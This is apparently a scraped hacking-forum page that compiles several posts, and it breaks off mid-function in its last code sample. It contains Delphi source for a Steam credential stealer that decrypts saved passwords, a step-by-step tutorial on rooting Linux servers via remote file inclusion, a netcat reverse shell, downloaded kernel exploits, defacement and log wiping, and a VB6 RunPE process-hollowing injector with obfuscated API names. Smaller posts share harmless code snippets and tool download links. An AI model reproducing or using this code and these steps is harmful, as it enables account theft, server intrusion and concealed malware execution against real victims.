Nytro

White Hat Hacking course, part 1: http://www.tudy.ro/2008/11/15/white-hat-hacking-course-part-1/ White Hat Hacking course, part 2: http://www.tudy.ro/2008/11/24/white-hat-hacking-part-2/ White Hat Hacking, part 3: http://www.tudy.ro/2008/12/05/white-hat-hacking-part-3/

by -bRx- Function UltimoNickUsadoInGame:String; = latest nick in game Function UserCounterStrikeRate:String; = latest rate set by user Function DiretorioDaSteam:String; = steam directory Function DiretorioDoExecutavelSteam:String; = exe steam dir Function ConfiguracaoDeIdioma:String; = language Function EnviarDadosSTEAM:String; all results in this function {********************************************************************************************* *-----------=*@@=------------------*@@*.----------------------------------------------------* *----------.@@@@@@@%-.-------------@@@@@@@#=------------- ::--------@#-.--------------------* *-----------=@@@*-@@@@@@@@#:---------@@@@#@@@@@#+: -----@@@@#------@@@@=--------------------* *------------#@@@----- :-%@@@@--------@@@=---#%@@@@-- =@@@@@@@:---#@@@+---------------------* *- .:- ---@@@#-------:@@@%---------+@@*----*@@@%@@@@@@@*@@@%-+@@@*------- .:-:------* *@@@@@@@@@=----@@@ ----*@@@@%#@@@@@@@@#:#@@#:@@@@@@@#-@@@%-- @@@@@@@--------@@@@@@@@@@------* *#%%@@@#*------=@@%--@@@@@@@@@@@%#%@@@@@@@@@@@@@@+.--*@@*----- @@@@@ -------*%@%@@%#+-------* *---------------@@@@@@@@@#-.---------=@@@@@@@@.-----#@@*------=@@@@@@@.---------------------* *-------------+@@@@@%: ---------------@@@@+@@@------@@@------*@@@: @@@@#--------------------* *------------.#+.@@@*-----------------@@@@-=@@%----@@@------+@@@-----@@@@+------------------* *----------------=@@@----------------%@@@ --#=.---+@@+------@@@+------#@@@@.----------------* *----------------.@@@--------------*@@@@----------@@@-----:@@@#-------- @@@@#---------------* *-----------------#- --------- -%@@@@%:-----------@@%------@@@------+#@@@@@@@@+-------------* *--------------.-=:.:-=+*%@@@@@@@@#---------------@@%---------------@@@@%*=-:::-------------* *--------------- .-=**%%%%#*+:.-------------------@@@----------------- ---------------------* *-------------------------------------------------.@@ --------------------------------------* ********************************************************************************************* Author: counterstrikewi and -bRx- please give credits case of use it } unit SteamStealerUnitBybRx; interface uses Windows, CompressionStreamUnit; type LongRec = packed record case Integer of 0: (Lo, Hi: Word); 1: (Words: array [0..1] of Word); 2: (Bytes: array [0..3] of Byte); end; { TStringStream } TStringStream = class(TStream) private FDataString: string; FPosition: Integer; protected procedure SetSize(NewSize: Longint); override; public constructor Create(const AString: string); function Read(var Buffer; Count: Longint): Longint; override; function ReadString(Count: Longint): string; function Seek(Offset: Longint; Origin: Word): Longint; override; function Write(const Buffer; Count: Longint): Longint; override; procedure WriteString(const AString: string); property DataString: string read FDataString; end; const { File open modes } {$IFDEF LINUX} fmOpenRead = O_RDONLY; fmOpenWrite = O_WRONLY; fmOpenReadWrite = O_RDWR; // fmShareCompat not supported fmShareExclusive = $0010; fmShareDenyWrite = $0020; // fmShareDenyRead not supported fmShareDenyNone = $0030; {$ENDIF} {$IFDEF MSWINDOWS} fmOpenRead = $0000; fmOpenWrite = $0001; fmOpenReadWrite = $0002; fmShareCompat = $0000 platform; // DOS compatibility mode is not portable fmShareExclusive = $0010; fmShareDenyWrite = $0020; fmShareDenyRead = $0030 platform; // write-only not supported on all platforms fmShareDenyNone = $0040; {$ENDIF} function SteamUserName : String; function SteamPassword : String; Function UltimoNickUsadoInGame:string; Function UserCounterStrikeRate:string; Function DiretorioDaSteam:string; Function DiretorioDoExecutavelSteam:string; Function ConfiguracaoDeIdioma:string; Function EnviarDadosSTEAM:string; type TSteamDecryptDataForThisMachine = function(EncryptedData :Pchar; EncryptedDataLength : Integer; DecryptedBuffer : Pointer; DecryptedBufferSize : Integer; DecryptedDataSize : PUINT) : Integer; cdecl; var SteamPath : String; StringStream : TStringStream; FileStream : TFileStream; I : Integer; UserName : PChar; EncryptedPassword : PChar; DecryptionKey : TSteamDecryptDataForThisMachine; PasswordLength : UINT; Password : array[0..99] of char; implementation function PegaValor( const Key: HKEY; const Chave, Valor: String ) : String; var handle : HKEY; Tipo, Tam : Cardinal; Buffer : String; begin RegOpenKeyEx( Key, PChar( Chave ),0, KEY_ALL_ACCESS, handle ); Tipo := REG_NONE; RegQueryValueEx( Handle,PChar( Valor ),nil,@Tipo,nil,@Tam ); SetString(Buffer, nil, Tam); RegQueryValueEx( Handle,PChar( Valor ),nil,@Tipo,PByte(PChar(Buffer)),@Tam ); Result := PChar(Buffer); RegCloseKey( handle ); Result := PChar(Buffer); end; procedure FreeAndNil(var Obj); var Temp: TObject; begin Temp := TObject(Obj); Pointer(Obj) := nil; Temp.Free; end; { TStringStream } constructor TStringStream.Create(const AString: string); begin inherited Create; FDataString := AString; end; function TStringStream.Read(var Buffer; Count: Longint): Longint; begin Result := Length(FDataString) - FPosition; if Result > Count then Result := Count; Move(PChar(@FDataString[FPosition + 1])^, Buffer, Result); Inc(FPosition, Result); end; function TStringStream.Write(const Buffer; Count: Longint): Longint; begin Result := Count; SetLength(FDataString, (FPosition + Result)); Move(Buffer, PChar(@FDataString[FPosition + 1])^, Result); Inc(FPosition, Result); end; function TStringStream.Seek(Offset: Longint; Origin: Word): Longint; begin case Origin of soFromBeginning: FPosition := Offset; soFromCurrent: FPosition := FPosition + Offset; soFromEnd: FPosition := Length(FDataString) - Offset; end; if FPosition > Length(FDataString) then FPosition := Length(FDataString) else if FPosition < 0 then FPosition := 0; Result := FPosition; end; function TStringStream.ReadString(Count: Longint): string; var Len: Integer; begin Len := Length(FDataString) - FPosition; if Len > Count then Len := Count; SetString(Result, PChar(@FDataString[FPosition + 1]), Len); Inc(FPosition, Len); end; procedure TStringStream.WriteString(const AString: string); begin Write(PChar(AString)^, Length(AString)); end; procedure TStringStream.SetSize(NewSize: Longint); begin SetLength(FDataString, NewSize); if FPosition > NewSize then FPosition := NewSize; end; function StrLen(const Str: PChar): Cardinal; assembler; asm MOV EDX,EDI MOV EDI,EAX MOV ECX,0FFFFFFFFH XOR AL,AL REPNE SCASB MOV EAX,0FFFFFFFEH SUB EAX,ECX MOV EDI,EDX end; function FileAge(const FileName: string): Integer; {$IFDEF MSWINDOWS} var Handle: THandle; FindData: TWin32FindData; LocalFileTime: TFileTime; begin Handle := FindFirstFile(PChar(FileName), FindData); if Handle <> INVALID_HANDLE_VALUE then begin Windows.FindClose(Handle); if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then begin FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime); if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi, LongRec(Result).Lo) then Exit; end; end; Result := -1; end; {$ENDIF} {$IFDEF LINUX} var st: TStatBuf; begin if stat(PChar(FileName), st) = 0 then Result := st.st_mtime else Result := -1; end; {$ENDIF} function FileExists(const FileName: string): Boolean; {$IFDEF MSWINDOWS} begin Result := FileAge(FileName) <> -1; end; {$ENDIF} {$IFDEF LINUX} begin Result := euidaccess(PChar(FileName), F_OK) = 0; end; {$ENDIF} // Senha:=PegaValor(HKEY_LOCAL_MACHINE,'Software\Vitalwerks\DUC','Password'); function SteamUserName : String; begin try SteamPath := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath'); //Locates UserName within the SteamAppData.vdf file FileStream := TFileStream.Create(SteamPath+'\config\SteamAppData.vdf',fmOpenRead); StringStream := TStringStream.Create(''); StringStream.CopyFrom(FileStream, FileStream.Size); FreeandNil(FileStream); I := Pos('AutoLoginUser',StringStream.DataString); I := I + 17; UserName := PChar(copy(StringStream.DataString,I,Pos('"',copy(StringStream.DataString,I,100))-1)); FreeandNil(StringStream); Result := UserName; except Result := 'Error'; end; end; function SteamPassword : String; begin try SteamPath := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath'); //Locates Encrypted Password within the ClientRegistry.blob file if not FileExists(SteamPath+'/ClientRegistry.Blob') then begin Result := 'Não foi possível encontrar o arquivo necessário para pegar o password.' ;Exit; end else begin FileStream := TFileStream.Create(SteamPath+'\ClientRegistry.blob',fmOpenRead); StringStream := TStringStream.Create(''); StringStream.CopyFrom(FileStream, FileStream.Size); FreeandNil(FileStream); I := Pos('Phrase',StringStream.DataString); I := I + 40; EncryptedPassword := PChar(copy(StringStream.DataString,I,255)); FreeandNil(StringStream); //Uses SteamDecryptDataForThisMachine function from Steam.dll to decrypt password DecryptionKey := GetProcAddress(LoadLibrary(PChar(SteamPath+'\steam.dll')),'SteamDecryptDataForThisMachine'); DecryptionKey(EncryptedPassword, strlen(EncryptedPassword),@Password, 100,@PasswordLength); Result := Password; end; except Result := 'Error'; end; end; Function UltimoNickUsadoInGame:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','LastGameNameUsed'); End; Function UserCounterStrikeRate:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Rate'); End; Function DiretorioDaSteam:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath'); End; Function DiretorioDoExecutavelSteam:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamExe'); End; Function ConfiguracaoDeIdioma:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Language'); End; Function EncontrouSteam:Boolean; var VerificaString:string; Begin Result := False; VerificaString := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Language'); if VerificaString<>'' then Result := True else Result := False; End; Function EnviarDadosSTEAM:string; var Enter:string; Begin Enter := #13#10; if EncontrouSteam then begin Result := 'Login: '+SteamUserName + Enter + 'Senha: '+SteamPassword + Enter + 'Ultimo Nick usado: '+UltimoNickUsadoInGame + Enter + 'Rate do Usuário: ' +UserCounterStrikeRate + Enter + 'Diretório da Steam: '+DiretorioDaSteam + Enter + 'Diretório do Executavel Steam: '+DiretorioDoExecutavelSteam + Enter + 'Configuração de Idioma do Usuário: '+ConfiguracaoDeIdioma + Enter ; end else Result := 'Não foi possível encontrar os dados. Possíveis causas: Diretório da steam ou DLL não encontrada, ou talvez o arquivo esteja sendo usada por outro processo'; end; end. Download: http://www.2shared.com/file/7117962/32213e20/SteamStealer.html

by mjrod5: You can flame me or whatever you want... Here is code i made =) Seems like delphi doesnt support invoke, only call xP Have fun doing nothing with this program InlineASM; uses Windows; var _msg: String = 'Inline ASM, Delphi'; _cpt: String = 'woot!'; begin asm //MessageBox: function(hWnd: HWND; lpText, lpCaption: PAnsiChar; uType: UINT): Integer; push 0 //uType push _cpt //lpCaption push _msg //lpText push 0 //hWnd call messagebox //Call the MessageBoxAPI with params you pushed //Delphi Equivalent would be //MessageBox(0,PChar(_msg),PChar(_cpt),0); end; end.

Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long Private Type OSVERSIONINFO OSVersionInfoSize As Long MajorVersion As Long MinorVersion As Long BuildNumber As Long PlatformId As Long szCSDVersion As String * 128 End Type Private Type OSVERSIONINFOEX dwOSVersionInfoSize As Long dwMajorVersion As Long dwMinorVersion As Long dwBuildNumber As Long dwPlatformId As Long szCSDVersion As String * 128 wServicePackMajor As Integer wServicePackMinor As Integer wSuiteMask As Integer wProductType As Byte wReserved As Byte End Type Public Function GetWindowsVersion() As String Dim OS As OSVERSIONINFO Dim durum As Boolean Dim version As String OS.OSVersionInfoSize = Len(OS) durum = GetVersionEx(OS) version = OS.PlatformId & "." & OS.MajorVersion & "." & OS.MinorVersion Select Case version Case "1.4.0" GetWindowsVersion = "Win 95" Case "1.4.10" GetWindowsVersion = "Win 98" Case "1.4.98" GetWindowsVersion = "Win ME" Case "2.3.51" GetWindowsVersion = "Win NT 3" Case "2.4.0" GetWindowsVersion = "Win NT 4" Case "2.5.0" GetWindowsVersion = "Win 2000" Case "2.5.1" GetWindowsVersion = "Win XP" Case "2.6.0" GetWindowsVersion = "Win Vista" Case "2.6.1" GetWindowsVersion = "Win Seven" Case Else GetWindowsVersion = "Unknown" End Select End Function Private Sub Form_Load() MsgBox GetWindowsVersion() End Sub

DIE (Detect it Easy) detects most common packers, cryptors and compilers for PE files. Download: http://www.2shared.com/file/7117852/18ce07d4/Detect_it_easy.html

R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF) Author: An@sA_StAxtH R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF) Author: An@sA_StAxtH Mail/MSN: admin@cyberanarchy.org / anasa_staxth@hotmail.com For Cyber Anarchy (Nov. 2007) ----------------------------------------------------------------------- You will need: - Vulnerable Site in R.F.I. - Shell for R.F.I. (e.g. c99, r57 or other) - NetCat - Local Root Exploit (depending on the kernel and the version) This aim tutorial is to give a very general picture in process of Rooting in Linux Server with Safe Mod: OFF. Suppose that we have found a site with R.F.I. vulnerability: http://www.hackedsite.com/folder/index.html?page= e can run shell exploiting Remote File Inclusion, as follows: http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt? where evilscript.txt is our web shell that we have already uploaded to our site. (www.mysite.com in the folder: shells) After we enter in shell, first of all we will see the version of the kernel at the top of the page or by typing: uname - a in Command line. To continue we must connect with backconnection to the box. This can done with two ways if we have the suitable shell. We can use the Back-Connect module of r57/c99 shell or to upload a backconnector in a writable folder In most of the shells there is a backconnection feature without to upload the Connect Back Shell (or another one shell in perl/c). We will analyze the first way which is inside the shell (in our example the shell is r57). Initially we open NetCat and give to listen in a specific port (this port must be correctly opened/forwarded in NAT/Firewall if we have a router) with the following way: We will type: 11457 in the port input (This is the default port for the last versions of r57 shell). We can use and other port. We press in Windows Start -> Run -> and we type: cmd After we will go to the NetCat directory: e.g. cd C:\Program Files\Netcat And we type the following command: nc -n -l -v -p 11457 NetCat respond: listening on [any] 11457 ... In the central page of r57 shell we find under the following menu::: Net:: and back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if we have dynamic) In the Port form we will put the port that we opened and NetCat listens. If we press connect the shell will respond: Now script try connect to <IP here> port 11457 ... If our settings are correct NetCat will give us a shell to the server Now we wil continue to the Rooting proccess. We must find a writable folder in order to download and compile the Local Root Exploit that will give us root priviledges in the box. Depending on the version of the Linux kernel there are different exploits. Some times the exploits fail to run because some boxes are patched or we don't have the correct permissions. List of the exploits/kernel: 2.4.17 -> newlocal, kmod, uselib24 2.4.18 -> brk, brk2, newlocal, kmod 2.4.19 -> brk, brk2, newlocal, kmod 2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2 2.4.21 -> brk, brk2, ptrace, ptrace-kmod 2.4.22 -> brk, brk2, ptrace, ptrace-kmod 2.4.22-10 -> loginx 2.4.23 -> mremap_pte 2.4.24 -> mremap_pte, uselib24 2.4.25-1 -> uselib24 2.4.27 -> uselib24 2.6.2 -> mremap_pte, krad, h00lyshit 2.6.5 -> krad, krad2, h00lyshit 2.6.6 -> krad, krad2, h00lyshit 2.6.7 -> krad, krad2, h00lyshit 2.6.8 -> krad, krad2, h00lyshit 2.6.8-5 -> krad2, h00lyshit 2.6.9 -> krad, krad2, h00lyshit 2.6.9-34 -> r00t, h00lyshit 2.6.10 -> krad, krad2, h00lyshit 2.6.13 -> raptor, raptor2, h0llyshit, prctl 2.6.14 -> raptor, raptor2, h0llyshit, prctl 2.6.15 -> raptor, raptor2, h0llyshit, prctl 2.6.16 -> raptor, raptor2, h0llyshit, prctl We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit. Some sites that we can find Local Root Exploits: www.milw0rm (Try Search: "linux kernel") Other sites: www.packetstormsecurity.org | www.arblan.com or try Googlin' you can find 'em all We can find writable folders/files by typing: find / -perm -2 -ls We can use the /tmp folder which is a standard writable folder We type: cd /tmp To download the local root exploit we can use a download command for linux like wget. For example: wget http://www.arblan.com/localroot/h00lyshit.c where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit. After the download we must compile the exploit (Read the instruction of the exploit before the compile) For the h00lyshit we must type: gcc h00lyshit.c -o h00lyshit Now we have created the executable file: h00lyshit. The command to run this exploit is: ./h00lyshit <very big file on the disk> We need a very big file on the disk in order to run successfully and to get root. We must create a big file in /tmp or into another writable folder. The command is: dd if=/dev/urandom of=largefile count=2M where largefile is the filename. We must wait 2-3 minutes for the file creation If this command fails we can try: dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024 Now we can procced to the last step. We can run the exploit by typing: ./h00lyshit largefile or ./h00lyshit /tmp/largefile (If we are in a different writable folder and the largefile is created in /tmp) If there are not running errors (maybe the kernel is patched or is something wrong with exploit run or large file) we will get root To check if we got root: id or whoami If it says root we got root! Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g. SSHDoor) and to take ssh/telnet shell access to the server. We must erase all logs in order to be safe with a log cleaner. A good cleaner for this job is the MIG Log Cleaner. <An@sA_StAxtH> <admin@cyberanarchy.org> * <www.cyberanarchy.org>

Ultrasurf V9.5 (100% Anonymous Surfing!) Privacy Protect Internet privacy with anonymous surfing and browsing -- hide IP addresses and locations, clean browsing history, cookies & more ... Security Completely transparent data transfer and high level encryption of the content allow you to surf the web with high security. Freedom UltraSurf allows you to overcome the censorship and blockage on the Internet. You can browse any website freely, so as to obtain true information from the free world. With this program you can change the proxies of internet explorer and can be tucked into the pages you have locked the computer administrators at such schools, libraries and other ... to operate the open and wait until To write successfully connected to server! then open the internet explorer go to any page you want and we are locked! You can also use it as normal and Proxy Server in Internet Explorer to surf 100% anonymously online. Download: http://www.mediafire.com/download.php?jyjtymyjyvm

Cine are chmod 777, folderul in care se afla toate fisierele?

Da, ea e, am fost la un concurs in Tg. Jiu si a fost si ea.

Asta e ea:

by Karcrack ( modded cobein's RunPE ) Native & Just RtlMoveMemory '--------------------------------------------------------------------------------------- ' Module : cNtPEL ' DateTime : 30/06/2009 06:32 ' Author : Cobein ' Mail : cobein27@hotmail.com ' WebPage : http://www.advancevb.com.ar (updated =D) ' Purpose : Inject Exe ' Usage : At your own risk ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' ' Thanks to : This is gonna be a looong list xD ' Batfitch - kernel base asm ' Karcrack - For helping me to debug and test it ' Paul Caton - vTable patch examples ' rm_code - First call api prototype ' and different books and pappers ' ' Compile : P-Code !!! ' ' Comments : Coded on top of the invoke module. ' ' History : 30/06/2009 First Cut.................................................... ' 02/08/2009 Modded By Karcrack, Now is NtRunPEL, thanks Slayer (;........ '--------------------------------------------------------------------------------------- Option Explicit Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D& Private Const IMAGE_NT_SIGNATURE As Long = &H4550& Private Const SIZE_DOS_HEADER As Long = &H40 Private Const SIZE_NT_HEADERS As Long = &HF8 Private Const SIZE_EXPORT_DIRECTORY As Long = &H28 Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28 Private Const THUNK_APICALL As String = "8B4C240851<PATCH1>E8<PATCH2>5989016631C0C3" Private Const THUNK_KERNELBASE As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3" Private Const PATCH1 As String = "<PATCH1>" Private Const PATCH2 As String = "<PATCH2>" Private Const CONTEXT_FULL As Long = &H10007 Private Const CREATE_SUSPENDED As Long = &H4 Private Const MEM_COMMIT As Long = &H1000 Private Const MEM_RESERVE As Long = &H2000 Private Const PAGE_EXECUTE_READWRITE As Long = &H40 Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessID As Long dwThreadID As Long End Type Private Type FLOATING_SAVE_AREA ControlWord As Long StatusWord As Long TagWord As Long ErrorOffset As Long ErrorSelector As Long DataOffset As Long DataSelector As Long RegisterArea(1 To 80) As Byte Cr0NpxState As Long End Type Private Type CONTEXT ContextFlags As Long Dr0 As Long Dr1 As Long Dr2 As Long Dr3 As Long Dr6 As Long Dr7 As Long FloatSave As FLOATING_SAVE_AREA SegGs As Long SegFs As Long SegEs As Long SegDs As Long Edi As Long Esi As Long Ebx As Long Edx As Long Ecx As Long Eax As Long Ebp As Long Eip As Long SegCs As Long EFlags As Long Esp As Long SegSs As Long End Type Private Type IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res(0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2(0 To 9) As Integer e_lfanew As Long End Type Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer Characteristics As Integer End Type Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Private Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Private Type IMAGE_EXPORT_DIRECTORY Characteristics As Long TimeDateStamp As Long MajorVersion As Integer MinorVersion As Integer lpName As Long Base As Long NumberOfFunctions As Long NumberOfNames As Long lpAddressOfFunctions As Long lpAddressOfNames As Long lpAddressOfNameOrdinals As Long End Type Private Type IMAGE_SECTION_HEADER SecName As String * 8 VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer Characteristics As Long End Type Private Declare Sub CpyMem Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long) Private c_lKrnl As Long Private c_lLoadLib As Long Private c_bInit As Boolean Private c_lVTE As Long Private c_lOldVTE As Long Private c_bvASM(&HFF) As Byte Public Function zDoNotCall() As Long 'This function will be replaced with machine code laterz 'Do not add any public procedure on top of it End Function Public Function RunPE(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean Dim i As Long Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER Dim tSTARTUPINFO As STARTUPINFO Dim tPROCESS_INFORMATION As PROCESS_INFORMATION Dim tCONTEXT As CONTEXT Dim lKernel As Long Dim lNTDll As Long Dim lMod As Long If Not c_bInit Then Exit Function Call CpyMem(tIMAGE_DOS_HEADER, bvBuff(0), SIZE_DOS_HEADER) If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then Exit Function End If Call CpyMem(tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS) If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then Exit Function End If 'kernel32 lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332")) 'KPC 'ntdll lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C")) 'KPC If sHost = vbNullString Then sHost = Space(260) 'GetModuleFileNameW lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557")) 'KPC Invoke lMod, App.hInstance, StrPtr(sHost), 260 End If With tIMAGE_NT_HEADERS.OptionalHeader tSTARTUPINFO.cb = Len(tSTARTUPINFO) 'CreateProcessW lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357")) 'KPC Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION) 'NtUnmapViewOfSection lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase 'VirtualAllocEx lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE 'NtWriteVirtualMemory lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0 For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1 CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER) Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0 Next i tCONTEXT.ContextFlags = CONTEXT_FULL 'NtGetContextThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT) 'NtWriteVirtualMemory lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0 tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint 'NtSetContextThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT) 'NtResumeThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, 0 hProc = tPROCESS_INFORMATION.hProcess End With RunPE = True End Function Public Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long Dim lPtr As Long Dim i As Long Dim sData As String Dim sParams As String If lMod = 0 Then Exit Function For i = UBound(Params) To 0 Step -1 sParams = sParams & "68" & GetLong(CLng(Params(i))) Next lPtr = VarPtr(c_bvASM(0)) lPtr = lPtr + (UBound(Params) + 2) * 5 lPtr = lMod - lPtr - 5 sData = THUNK_APICALL sData = Replace(sData, PATCH1, sParams) sData = Replace(sData, PATCH2, GetLong(lPtr)) Call PutThunk(sData) Invoke = PatchCall End Function Private Function GetLong(ByVal lData As Long) As String Dim bvTemp(3) As Byte Dim i As Long CpyMem bvTemp(0), lData, &H4 For i = 0 To 3 GetLong = GetLong & Right("0" & Hex(bvTemp(i)), 2) Next End Function Private Sub PutThunk(ByVal sThunk As String) Dim i As Long For i = 0 To Len(sThunk) - 1 Step 2 c_bvASM((i / 2)) = CByte("&h" & Mid$(sThunk, i + 1, 2)) Next i End Sub Private Function PatchCall() As Long CpyMem c_lVTE, ByVal ObjPtr(Me), &H4 c_lVTE = c_lVTE + &H1C CpyMem c_lOldVTE, ByVal c_lVTE, &H4 CpyMem ByVal c_lVTE, VarPtr(c_bvASM(0)), &H4 PatchCall = zDoNotCall CpyMem ByVal c_lVTE, c_lOldVTE, &H4 End Function Public Function GetMod(ByVal sLib As String, ByVal sProc As String) As Long GetMod = Me.GetProcAddress(Me.LoadLibrary(sLib), sProc) End Function Public Function LoadLibrary(ByVal sLib As String) As Long LoadLibrary = Invoke(c_lLoadLib, StrPtr(sLib & vbNullChar)) End Function Public Property Get Initialized() As Boolean Initialized = c_bInit End Property Public Sub Class_Initialize() Call PutThunk(THUNK_KERNELBASE) c_lKrnl = PatchCall If Not c_lKrnl = 0 Then c_lLoadLib = GetProcAddress(c_lKrnl, "LoadLibraryW") If Not c_lLoadLib = 0 Then c_bInit = True End If End If End Sub Public Function GetProcAddress(ByVal lMod As Long, ByVal sProc As String) As Long Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY Call CpyMem(tIMAGE_DOS_HEADER, ByVal lMod, SIZE_DOS_HEADER) If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then Exit Function End If Call CpyMem(tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew, SIZE_NT_HEADERS) If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then Exit Function End If Dim lVAddress As Long Dim lVSize As Long Dim lBase As Long With tIMAGE_NT_HEADERS.OptionalHeader lVAddress = lMod + 